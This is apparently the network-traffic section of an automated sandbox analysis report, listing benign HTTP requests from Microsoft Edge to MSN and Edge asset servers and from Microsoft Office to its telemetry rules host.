Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=06FBC860557247358032020AD74BA317&MUID=11FAD531813A66492642C0058058675E HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1; SM=T
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQB.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
